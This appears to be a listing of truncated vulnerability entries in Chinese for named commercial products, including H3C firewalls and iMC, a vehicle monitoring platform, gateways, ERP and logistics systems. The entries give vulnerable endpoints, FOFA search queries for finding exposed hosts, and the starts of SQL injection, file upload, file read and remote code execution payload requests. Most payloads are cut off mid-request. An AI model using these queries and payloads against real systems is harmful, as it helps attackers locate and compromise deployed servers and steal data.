H49-1杭州三一谦成科技-车辆监控服务平台-SQL 漏洞描述: 杭州三一谦成科技车辆监控服务平台接口 /gps-web/platformSql 存在SQL 注入漏洞 漏洞复现: payload: POST /gps-web/platformSql HTTP/1.1 Host: User-Agent
H47-1杭州-三汇网关-RCE 漏洞复现: payload: POST /debug.php HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAEiWTHP0DxJ7Uwmb Use
H48-1H3C-SecPath下一代防火墙-任意文件上传 fofa语法: title=“Web user login” 漏洞复现: payload: POST /webui/?g=local_cert_delete_both HTTP/1.1 Host: xx.xx.xx.xx Accept-En
H46-3H3C-iMC智能管理中心 -RCE fofa语法: (title=“用户自助服务” && body=“/selfservice/javax.faces.resource/“) || body=“/selfservice/index.xhtml” 漏洞复现: payload: POST /
H42-1宏脉-医美行业管理系统-任意文件读取 漏洞复现: payload: POST /zh-CN/PublicInterface/DownLoadServerFile HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS
H46-1H3C-iMC智能管理中心 -RCE 漏洞描述: H3C iMC智能管理中心 /byod/index.xhtml、/selfservice/login.jsf、/rpt/reportpage/loginrpt.jsf等多个接口处存在远程代码执行漏洞,未经身份攻击者可通过该漏洞在服务器端任意
H46-2H3C-iMC智能管理中心 -RCE fofa语法: (title=“用户自助服务” && body=“/selfservice/javax.faces.resource/“) || body=“/selfservice/index.xhtml” 漏洞复现: payload: POST /
H41-1湖南众合百易信息技术有限公司-资产管理运营系统 -任意文件上传 漏洞复现: payload: POST /comfileup.php HTTP/1.1 Host: xxx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15;
H39-1华磊-科技物流-SQL fofa语法: body=“l_c_bar”||body=“l_c_center” 漏洞复现: payload: GET /modifyInsurance.htm?documentCode=-1&insuranceValue=-1&customerId=-1+and
H40-1汇智-EDR-任意文件读取 漏洞描述: 汇智ERP filehandle.aspx 接口处任意文件读取漏洞,未经身份验证的攻击者可以利用此漏洞读取系统内部配置文件,造成信息泄露,导致系统处于极不安全的状态 网站图片: fofa语法: icon_hash=“-642591392” 漏洞复现:
